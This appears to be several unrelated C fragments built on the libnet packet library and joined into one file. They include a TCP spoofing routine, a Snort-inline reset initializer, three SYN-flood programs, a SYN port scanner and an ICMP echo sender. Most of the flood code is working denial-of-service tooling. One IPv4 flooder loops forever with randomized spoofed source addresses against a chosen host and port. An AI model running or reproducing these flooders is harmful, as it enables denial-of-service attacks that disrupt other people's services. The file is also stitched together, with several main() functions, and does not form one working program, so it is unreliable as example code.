*((u_int16_t *)(mac + 4)) = libnet_get_prand(LIBNET_PRu16);
}
void
drench_send_tcp(pkt_t *dp, u_int8_t offset, u_char *pkt)
{
struct ether_header *eh = NULL;
struct ip *ih = NULL;
struct tcphdr *th = NULL;
char *state = NULL;
in_port_t sport = 0;
size_t paylen = 0;
u_int32_t isn = 0;
if (dp->payload != NULL)
paylen = strlen(dp->payload);
state = TCP_PHASE(dp->flags, "S", "A");
if (pkt != NULL) {
eh = (struct ether_header *)pkt;
ih = (struct ip *)(pkt + sizeof(struct ether_header));
th = (struct tcphdr *)(pkt + sizeof(struct ether_header) + sizeof(struct ip));
isn = th->th_ack;
sport = th->th_dport;
}
else {
sport = libnet_get_prand(LIBNET_PRu16);
}
/* Sanity check: check the ack number of the packet to
* make sure we sent it. We can do this by performing
* a calculation on the sequence number we
* send, based on a "secret" random number */
if (check_isn(dp, sport, &isn) < 0) {
(void)fprintf(stdout,
"(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u INVALID ISN in ACK%s [isn = %u]\n",
state,
TCP_PHASE(
dp->flags,
dp->saddr,
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport,
(dp->opts & O_CHKISN ? ", DROPPING PACKET" : ""),
isn);
if (dp->opts & O_CHKISN)
return;
}
LIBNET_ERR(dp->p_tcp = libnet_build_tcp(
TCP_PHASE(dp->flags, sport, th->th_dport), /* Source port */
dp->dport, /* Destination port */
TCP_PHASE(dp->flags, isn, (th->th_ack + paylen)), /* ISN */
/* Sniffed packet's seq num */
TCP_PHASE(dp->flags, 0, (th->th_seq + 1)), /* ACK */
TCP_PHASE(dp->flags, dp->flags, dp->flags /*| TH_PUSH*/), /* Control flags */
dp->winsize, /* window size */
0, /* auto checksum */
0, /* Urgent data pointer */
TCP_PHASE(dp->flags, LIBNET_TCP_H, LIBNET_TCP_H + paylen), /* total packet length */
TCP_PHASE(dp->flags, NULL, (u_char *)dp->payload), /* payload */
TCP_PHASE(dp->flags, 0, paylen), /* payload size */
dp->l, /* libnet context */
dp->p_tcp /* ptag */
));
LIBNET_ERR(dp->p_ip = libnet_build_ipv4(
TCP_PHASE(dp->flags, LIBNET_IPV4_H + LIBNET_TCP_H, LIBNET_IPV4_H + LIBNET_TCP_H + paylen),
TCP_PHASE(dp->flags, 0, IPTOS_LOWDELAY), /* TOS */
libnet_get_prand(LIBNET_PRu16),
0, /* Frag */
MAX_TTL, /* TTL */
IPPROTO_TCP, /* Protocol */
0, /* auto checksum */
TCP_PHASE(dp->flags, htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
ih->ip_dst.s_addr), /* XXX error check, source */
TCP_PHASE(dp->flags, libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE),
ih->ip_src.s_addr), /* XXX error check, destination */
NULL, /* payload */
0, /* payload size */
dp->l, /* libnet context */
dp->p_ip /* libnet ptag */
));
if (libnet_write(dp->l) == -1)
state = "x";
(void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u\n", state,
TCP_PHASE(
dp->flags,
libnet_addr2name4(
htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
LIBNET_DONT_RESOLVE
),
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport);
(void)fflush(stdout);
}
/*
* Function: void InitInlinePostConfig
*
* Purpose: perform initialization tasks that depend on the configfile
*
* Args: none
*
* Returns: nothing void function
*/
void InitInlinePostConfig(void)
{
int tcp_size = 0;
int icmp_size = 0;
//printf("InitInline stage 2: InitInlinePostConfig starting...\n");
/* Let's initialize Libnet, but not if we are in
* layer 2 resets mode, because we use the link
* layer then... */
#ifndef IPFW
if(pv.layer2_resets)
{
tcp_size = ETH_H + IP_H + TCP_H;
icmp_size = 128 + ETH_H;
}
else
#endif
{
//printf("opening raw socket in IP-mode\n");
if((libnet_nd = libnet_open_raw_sock(IPPROTO_RAW)) < 0)
{
fprintf(stdout, "InitInline: Could not open raw socket for libnet\n");
exit(-1);
}
tcp_size = IP_H + TCP_H;
icmp_size = 128;
}
/* init */
l_tcp = calloc(tcp_size, sizeof(char));
if (l_tcp == NULL)
{
perror("InitInline: Could not allocate l_tcp\n");
exit(-1);
}
l_icmp = calloc(icmp_size, sizeof(char));
if (l_icmp == NULL)
{
perror("InitInline: Could not allocate l_icmp\n");
exit(-1);
}
#ifndef IPFW
if(pv.layer2_resets)
{
/* Building Layer 2 Reset Packets */
printf("building cached link layer reset packets\n");
libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 255,
IPPROTO_TCP, 0, 0, NULL, 0, l_tcp + ETH_H);
libnet_build_tcp(0, 0, 0, 0, TH_RST|TH_ACK, 0, 0, NULL, 0,
l_tcp + ETH_H + IP_H);
/* create icmp cached packet */
libnet_build_ip(ICMP_UNREACH_H, 0, libnet_get_prand(PRu16), 0,
255, IPPROTO_ICMP, 0, 0, NULL, 0, l_icmp + ETH_H);
libnet_build_icmp_unreach(3, 3, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0,
l_icmp + ETH_H + IP_H);
}
else
#endif
{
/* Building Socket Reset Packets */
printf("building cached socket reset packets\n");
libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 255,
IPPROTO_TCP, 0, 0, NULL, 0, l_tcp);
libnet_build_tcp(0, 0, 0, 0, TH_RST|TH_ACK, 0, 0, NULL, 0,
l_tcp + IP_H);
/* create icmp cached packet */
libnet_build_ip(ICMP_UNREACH_H, 0, libnet_get_prand(PRu16), 0,
255, IPPROTO_ICMP, 0, 0, NULL, 0, l_icmp);
libnet_build_icmp_unreach(3, 3, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0,
l_icmp + IP_H);
}
}
int
main(int argc, char **argv)
{
struct libnet_in6_addr dst_ip;
struct libnet_in6_addr src_ip;
u_short dst_prt = 0;
u_short src_prt = 0;
libnet_t *l;
libnet_ptag_t tcp, ip, ip_frag;
u_char *cp;
char errbuf[LIBNET_ERRBUF_SIZE];
int i, j, c, packet_amt, burst_int, burst_amt;
char srcname[100], dstname[100];
u_int8_t payload[56];
packet_amt = 0;
burst_int = 0;
burst_amt = 1;
tcp = ip_frag = ip = LIBNET_PTAG_INITIALIZER;
printf("libnet 1.1 syn flooding: TCP IPv6 fragments [raw]\n");
l = libnet_init(
LIBNET_RAW6, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
{
switch (c)
{
case 't':
if (!(cp = strrchr(optarg, '/')))
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
dst_ip = libnet_name2addr6(l, optarg, 1);
if (strncmp((char*)&dst_ip,
(char*)&in6addr_error,sizeof(in6addr_error))==0)
{
fprintf(stderr, "Bad IPv6 address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'a':
packet_amt = atoi(optarg);
break;
case 'i':
burst_int = atoi(optarg);
break;
case 'b':
burst_amt = atoi(optarg);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE);
/* src_ip = libnet_name2addr6(l,
"3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE);
dst_prt = 113;
dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE);
packet_amt = 1;
*/
if (!dst_prt || strncmp((char*)&dst_ip,
(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
libnet_addr2name6_r(src_ip, LIBNET_RESOLVE, srcname, sizeof(srcname));
libnet_addr2name6_r(dst_ip, LIBNET_RESOLVE, dstname, sizeof(dstname));
for(; burst_amt--;)
{
for (i = 0; i < packet_amt; i++)
{
for (j = 0; j < 56; j++) payload[j] = 'A' + ((char)(j % 26));
tcp = libnet_build_tcp(
src_prt = libnet_get_prand(LIBNET_PRu16),
dst_prt,
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
TH_SYN,
libnet_get_prand(LIBNET_PRu16),
0,
0,
LIBNET_TCP_H,
NULL,
0,
l,
tcp);
if (tcp == -1)
{
fprintf(stderr, "Can't build or modify TCP header: %s\n",
libnet_geterror(l));
return (EXIT_FAILURE);
}
ip_frag = libnet_build_ipv6_frag(
IPPROTO_TCP, /* next header */
0, /* reserved */
0, /* frag bits */
1, /* ip id */
NULL,
0,
l,
ip_frag);
if (ip_frag == -1)
{
fprintf(stderr, "Can't build or modify TCP header: %s\n",
libnet_geterror(l));
return (EXIT_FAILURE);
}
ip = libnet_build_ipv6(
0, 0,
LIBNET_TCP_H,
IPPROTO_TCP,
64,
src_ip,
dst_ip,
NULL,
0,
l,
ip);
if (ip == -1)
{
fprintf(stderr, "Can't build or modify TCP header: %s\n",
libnet_geterror(l));
return (EXIT_FAILURE);
}
printf("%15s/%5d -> %15s/%5d\n",
srcname,
ntohs(src_prt),
dstname,
dst_prt);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
}
#if !(__WIN32__)
usleep(250);
#else
Sleep(250);
#endif
}
#if !(__WIN32__)
sleep(burst_int);
#else
Sleep(burst_int * 1000);
#endif
}
exit(EXIT_SUCCESS);
}
int main(int argc, char *argv[]) {
libnet_t *libnet_context;
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE];
int opt, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
libnet_context = libnet_init(LIBNET_RAW4, NULL, errbuf); // Init libnet context
if ( libnet_context == NULL )
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
dest_ip = libnet_name2addr4(libnet_context, argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
libnet_seed_prand(libnet_context); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // checksum (0 autofill)
0, // urgent pointer
LIBNET_TCP_H, // tcp packet length
NULL, // payload (none)
0, // payload length
libnet_context, // context
0); // ptag
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
0, // checksum
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
libnet_context, // libnet context
0); // ptag
byte_count = libnet_write(libnet_context); // inject packet
if ( byte_count != -1 )
printf("%d bytes written.\n", byte_count);
else
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(libnet_context));
libnet_clear_packet(libnet_context); // clear packet
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy(libnet_context); // free packet memory
return 0;
}
int
main(int argc, char **argv)
{
struct libnet_in6_addr dst_ip;
struct libnet_in6_addr src_ip;
u_short dst_prt = 0;
u_short src_prt = 0;
libnet_t *l;
libnet_ptag_t t;
char *cp;
char errbuf[LIBNET_ERRBUF_SIZE];
int i, c, packet_amt, burst_int, burst_amt, build_ip;
char srcname[100],dstname[100];
packet_amt = 0;
burst_int = 0;
burst_amt = 1;
printf("libnet 1.1 syn flooding: TCP6[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW6, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
{
switch (c)
{
case 't':
if (!(cp = strrchr(optarg, '/')))
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
dst_ip = libnet_name2addr6(l, optarg, 1);
if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0)
{
fprintf(stderr, "Bad IP6 address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'a':
packet_amt = atoi(optarg);
break;
case 'i':
burst_int = atoi(optarg);
break;
case 'b':
burst_amt = atoi(optarg);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE);
/*src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE);
dst_prt = 113;
dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE);
packet_amt = 1;*/
if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname));
libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname));
for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;)
{
for (i = 0; i < packet_amt; i++)
{
char payload[56];
int i;
for (i=0; i<56; i++) payload[i]='A'+((char)(i%26));
t = libnet_build_tcp(
src_prt = libnet_get_prand(LIBNET_PRu16),
dst_prt,
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
TH_SYN,
libnet_get_prand(LIBNET_PRu16),
0,
0,
LIBNET_TCP_H,
NULL,
0,
l,
t);
if (build_ip)
{
build_ip = 0;
printf("Packet len = %ld\n",LIBNET_ICMPV6_H+sizeof(payload));
libnet_build_ipv6(0,0,
LIBNET_TCP_H,
IPPROTO_TCP,
64,
src_ip,
dst_ip,
NULL,
0,
l,
0);
}
printf("%15s/%5d -> %15s/%5d\n",
srcname,
ntohs(src_prt),
dstname,
dst_prt);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
}
#if !(__WIN32__)
usleep(250);
#else
Sleep(250);
#endif
}
#if !(__WIN32__)
sleep(burst_int);
#else
Sleep(burst_int * 1000);
#endif
}
exit(EXIT_SUCCESS);
}
void sendsyns ()
{
libnet_t *l;
char errbuf[LIBNET_ERRBUF_SIZE];
u_long ip;
libnet_ptag_t tcp_pkt = LIBNET_PTAG_INITIALIZER;
libnet_ptag_t ip_pkt;
u_long dst_ip;
int count = 0;
char *payload = ""; // put your love note here.
u_short payload_s = strlen (payload);
int currentport = opts.low_port;
int build_header = 1;
/*
* pcap may be slow to initialize, so let's wait a second.
*/
sleep (1);
/*
* initialize libnet for raw IP packets. libnet will
* find an appropriate interface.
*/
l = libnet_init (LIBNET_RAW4, NULL, errbuf);
if (l == NULL) {
fprintf (stderr, "libnet_init failed: %s", errbuf);
exit (1);
}
/*
* get the IP address of the source interface
*/
ip = libnet_get_ipaddr4 (l);
if (-1 == ip) {
fprintf (stderr, "libnet_get_ipaddr4(l) failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
dst_ip = libnet_name2addr4 (l, (u_char *) opts.target, LIBNET_RESOLVE);
if (-1 == dst_ip) {
fprintf (stderr, "libnet_name2addr4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
/*
* Build and send a SYN packet, one for each port. The first time
* this loop is executed an IP packet will be constructed.
*/
printf ("scanning port %d through %d on %s\n",
opts.low_port,
opts.high_port, libnet_addr2name4 (dst_ip, LIBNET_DONT_RESOLVE));
while (currentport <= opts.high_port) {
/*
* Sleep a little... if we send packets too fast, some will get
* dropped.
*/
usleep (50);
/*
* Build the TCP packet with the SYN flag set. A payload is
* optional; for automated scans it is nice to include some text
* explaining why you are scanning (or ask first!). Fields with
* 0 will be calculated by libnet.
*/
tcp_pkt = libnet_build_tcp (opts.src_port, // source port
currentport++, // dest port
libnet_get_prand (LIBNET_PRu32), // seq
libnet_get_prand (LIBNET_PRu32), // ack
TH_SYN, // flags
libnet_get_prand (LIBNET_PRu16), // window size
0, // checksum
0, // urgent ptr
LIBNET_TCP_H + payload_s, // packet size
(u_char *) payload, // contents of packet
payload_s, // size of payload
l, // libnet handle
tcp_pkt); // libnet id
if (-1 == tcp_pkt) {
fprintf (stderr, "libnet_build_tcp() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
if (build_header) {
build_header = 0;
ip_pkt = libnet_autobuild_ipv4 (LIBNET_IPV4_H + LIBNET_TCP_H,
IPPROTO_TCP, dst_ip, l);
if (-1 == ip_pkt) {
fprintf (stderr, "libnet_autobuild_ipv4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
/*
* Send it!
*/
count = libnet_write (l);
if (-1 == count) {
fprintf (stderr, "libnet_write() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
printf ("\n");
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id, seq;
int i;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating a random id */
libnet_seed_prand(l);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* Getting destination IP address */
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if ( ip_addr == -1 ) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing 4 packets */
seq = 1;
for ( i = 0; i < 4; i++ ) {
/* Building the ICMP header */
if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
(seq + i), NULL, 0, l, 0) == -1 ) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building the IP header */
if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\
ip_addr, l) == -1 ) {
fprintf(stderr, "Error building IP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
if ( libnet_write(l) == -1 )
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
/* Clearing the packet */
/* Comment this to see what happens when you rebuild headers
* without calling libnet_clear_packet() */
libnet_clear_packet(l);
/* Waiting 1 second between each packet */
sleep(1);
}
libnet_destroy(l);
return 0;
}
